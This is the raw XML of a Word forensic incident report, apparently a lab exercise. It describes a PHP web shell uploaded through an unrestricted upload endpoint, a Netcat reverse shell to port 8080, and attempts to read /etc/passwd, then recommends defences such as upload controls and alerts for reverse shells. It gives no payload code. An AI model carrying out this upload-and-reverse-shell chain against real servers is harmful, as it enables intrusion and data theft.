          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="7F78A2AD" w14:textId="5FF37383">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="38D3002C" w14:textId="0A8246AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>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Attack Timeline</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable5Dark-Accent3"/>
        <w:bidiVisual w:val="0"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-765" w:type="dxa"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5760"/>
        <w:gridCol w:w="5760"/>
      </w:tblGrid>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="01BE2892">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31FB2154" w14:textId="2518558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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="34E72B93" w:rsidR="34E72B93">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Approx. Time</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17D64AC3" w14:textId="200EED2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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="34E72B93" w:rsidR="34E72B93">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="1C845452">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7E74F5BA" w14:textId="7ADA158E">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00:00</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490B3596" w14:textId="046A8454">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Initial HTTP connection established from attacker IP 117.11.88.124 to target server 24.49.63.79.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="21231679">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40502455" w14:textId="0469C7ED">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00:00–00:05</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3DBE12B0" w14:textId="2C462FF4">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Attacker browsed the application and accessed the main website using Firefox on Linux.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="5DE8CD83">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4B1A44BC" w14:textId="29281DFD">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00:26</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2EB9B567" w14:textId="12BB4F15">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HTTP POST request sent to /reviews/upload.php containing a multipart file upload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="00F1E079">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627E690D" w14:textId="15137C74">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00:26</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768BD06B" w14:textId="78DA12CB">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Malicious PHP file image.php uploaded successfully.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="5F91B4C8">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4EA1D0AE" w14:textId="2ED6FED8">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00:49</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7581987D" w14:textId="5750D158">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Attacker accessed /reviews/uploads/image.jpg.php, confirming successful deployment of the web shell.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="22C7E7EF">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10BF9215" w14:textId="409D2059">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00:49+</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7C142B5A" w14:textId="7CA2F70C">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Web shell executed a Netcat reverse shell command targeting 117.11.88.124:8080.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="26BE8C1B">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5760" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="1202280F" w14:textId="191A6A3F">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Post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="5760" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="45B1C68F" w14:textId="355F9796">
            <w:pPr>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Attacker attempted to access sensitive Linux system files including /etc/passwd.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="21169436" w14:textId="4C020CE8">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Findings</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="55BA8C96" w14:textId="68D72A62">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investigation produced the following confirmed findings:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable5Dark-Accent3"/>
        <w:bidiVisual w:val="0"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2333"/>
        <w:gridCol w:w="7228"/>
      </w:tblGrid>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="5AB4453A">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768A5DEA" w14:textId="1ABB867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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="34E72B93" w:rsidR="34E72B93">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Investigation Item</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64A3981F" w14:textId="17786E4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sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="34E72B93" w:rsidR="34E72B93">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Confirmed Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="22CFCBD3">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623E5A0F" w14:textId="7DA12000">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Attacker IP</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47EC81B5" w14:textId="5B52A596">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117.11.88.124</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="6D2D1E4B">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0756C056" w14:textId="6A35CF20">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Geographical Origin</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2EF1005F" w14:textId="2BFA1CD8">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Tianjin, China</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="32D2E69B">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6492D079" w14:textId="6A581816">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User-Agent</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3F8FF948" w14:textId="7301AE42">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Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="6A2384AC">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62931C64" w14:textId="69022B3A">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Upload Endpoint</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4AA7DC05" w14:textId="637F6804">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/reviews/upload.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="24F82F13">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451ECB50" w14:textId="0EB0830C">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Upload Directory</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6EEC0CF1" w14:textId="2C2F6CDF">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/reviews/uploads/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="2CD57002">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4F22DDC6" w14:textId="31009566">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Malicious Web Shell</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24389E2E" w14:textId="1D867ED0">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image.php / image.jpg.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="0D762264">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16259EE0" w14:textId="75B9A159">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Outbound Callback Port</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0F36D113" w14:textId="1AAF6A3F">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TCP 8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="628AFBDA">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010B55AB" w14:textId="721D6383">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Targeted File</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21CDE934" w14:textId="06C24572">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/etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="34E72B93" w:rsidTr="34E72B93" w14:paraId="2708E87F">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="2333" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="724A6876" w14:textId="3D5F1DE3">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Attack Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="7228" w:type="dxa"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="32714FA5" w14:textId="5B5F719D">
            <w:pPr>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4"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="34E72B93" w:rsidR="34E72B93">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Malicious PHP upload followed by reverse shell execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="1DD09F76" w14:textId="67559BDE">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w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="574DC623" w14:textId="2988C9A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="6185F3C0" w14:textId="10169308">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="571F0594" w14:textId="07CB0252">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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="2F02D2C1" w14:textId="09FDA8DF">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The forensic investigation confirmed that the compromise resulted from an unrestricted file upload vulnerability within the web application. The attacker uploaded a malicious PHP web shell through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/reviews/upload.php</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which was stored in the publicly accessible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/reviews/uploads/</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 directory and later executed directly through the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1F0E7F77" w14:textId="1A2E781D">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Execution of the uploaded shell established a reverse shell connection to the attacker using TCP port 8080, providing remote command execution capabilities on the compromised server. Post-exploitation activity included attempts to access sensitive Linux system files such as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/etc/passwd</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indicating that the attacker had progressed beyond initial access into system reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="0B00AAB1" w14:textId="702450AB">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The incident demonstrates how a single insecure file upload mechanism can lead to full remote code execution and potential data compromise. Immediate remediation and secure upload controls are therefore critical to prevent recurrence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="336928A2" w14:textId="310752EE">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Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="69A1EC99" w14:textId="5FA06661">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Restrict File Upload Types</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5A24C2B1" w14:textId="4A3B0522">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Allow only approved file extensions (e.g., .jpg, .png, .pdf).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="2BC8FBFE" w14:textId="04D114B2">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Reject all executable extensions including .php, .phtml, .phar, and double-extension files such as image.jpg.php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="4FFAB38E" w14:textId="56C5AA3D">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Store Uploads Outside the Web Root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="38C22122" w14:textId="42556C7B">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Uploaded files should never be stored inside a directory that can be executed by the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="56381544" w14:textId="3463ABD2">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Serve files through a controlled download mechanism instead of direct execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="608B76AA" w14:textId="4C6AB8AE">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Disable Script Execution in Upload Directories</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1B524C1B" w14:textId="3CA446C7">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Configure Apache or Nginx to disable PHP execution inside upload folders.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="7DB31225" w14:textId="617BE47F">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Example: deny execution of *.php within </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/reviews/uploads/</w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="45507A00" w14:textId="31A6D2A5">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Implement File Content Validation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="0CB4DA1E" w14:textId="2F9E39B6">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Verify MIME type and file signatures rather than relying solely on file extensions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="512788EE" w14:textId="4A1630DF">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Scan uploaded files using antivirus or sandbox-based malware inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="3D83B9D3" w14:textId="10241C92">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Monitor Outbound Connections</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5A0BF21E" w14:textId="3C41E45A">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Block unauthorized outbound ports such as 8080 from production web servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="746F6093" w14:textId="6BB7C855">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Alert on unexpected Netcat, Bash, or reverse-shell behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="3CEAF807" w14:textId="314B42B7">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Deploy a Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5000592E" w14:textId="643BF131">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Detect malicious multipart uploads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="7621D5C8" w14:textId="2E4C6CFF">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Block known web-shell patterns and suspicious PHP payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="3B3D12FF" w14:textId="06046504">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Enable Centralized Logging and SOC Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="57125149" w14:textId="319BA958">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Forward Apache, PHP, and system logs to a SIEM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="4AB712FF" w14:textId="78DB55D2">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Create detection rules for executable file uploads and outbound shell connections.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="1BA88662" w14:textId="23E965DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>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Perform Regular Security Assessments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5C618A78" w14:textId="266A292D">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Conduct penetration testing focused on file upload functionality.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="59628D97" w14:textId="4143047E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>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Review server permissions and application security configurations regularly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="63747BD8" w14:textId="180C87FF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="281" w:beforeAutospacing="off" w:after="281" w:afterAutospacing="off"/>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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="7458ADC6" w14:textId="0596C05E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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Wireshark Foundation. Wireshark User Guide.</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w:t>
      </w:r>
      <w:hyperlink r:id="R42a95dcd0e094f2a">
        <w:r w:rsidRPr="34E72B93" w:rsidR="52BCE230">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.wireshark.org/docs/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="080D9820" w14:textId="0EBC8995">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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OWASP Foundation. OWASP File Upload Cheat Sheet. </w:t>
      </w:r>
      <w:hyperlink r:id="Rbfeb1dc9b01e4505">
        <w:r w:rsidRPr="34E72B93" w:rsidR="52BCE230">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/File\_Upload\_Cheat\_Sheet.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="3B45E34C" w14:textId="420CC097">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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OWASP Foundation. OWASP Web Security Testing Guide.</w:t>
      </w:r>
      <w:r w:rsidRPr="34E72B93" w:rsidR="52BCE230">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w:t>
      </w:r>
      <w:hyperlink r:id="R9b51c7f8eda842e7">
        <w:r w:rsidRPr="34E72B93" w:rsidR="52BCE230">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-web-security-testing-guide/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="307BDA33" w14:textId="2E23ADE0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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IPInfo. IP Geolocation Lookup. </w:t>
      </w:r>
      <w:hyperlink r:id="R31c621b8ce0f494f">
        <w:r w:rsidRPr="34E72B93" w:rsidR="52BCE230">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://ipinfo.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="069D8919" w14:textId="671ED6DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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MITRE ATT&amp;CK Framework – Initial Access, Web Shell, Command and Control. </w:t>
      </w:r>
      <w:hyperlink r:id="R8fefa7415c694279">
        <w:r w:rsidRPr="34E72B93" w:rsidR="52BCE230">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="52BCE230" w:rsidP="34E72B93" w:rsidRDefault="52BCE230" w14:paraId="5EC95EC1" w14:textId="25B2EAAD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>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34E72B93" w:rsidR="52BCE230">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat Documentation – Reverse Shell Communication Concepts. </w:t>
      </w:r>
      <w:hyperlink r:id="Ra688e69a3d4e4607">
        <w:r w:rsidRPr="34E72B93" w:rsidR="52BCE230">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
            <w:i w:val="1"/>
            <w:iCs w:val="1"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://nmap.org/ncat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="34E72B93" w:rsidP="34E72B93" w:rsidRDefault="34E72B93" w14:paraId="001BB58D" w14:textId="367EE886">
      <w:pPr>
        <w:pStyle w:val="Normal"/>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e483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297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a84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f4c059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c3bf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de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e32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97d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c25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edc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5f6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e7b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8a0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97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0711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F20C1A"/>
    <w:rsid w:val="000F2B66"/>
    <w:rsid w:val="00D74DD6"/>
    <w:rsid w:val="00DED4D6"/>
    <w:rsid w:val="02C22EC1"/>
    <w:rsid w:val="03CF1820"/>
    <w:rsid w:val="056B22F1"/>
    <w:rsid w:val="056B22F1"/>
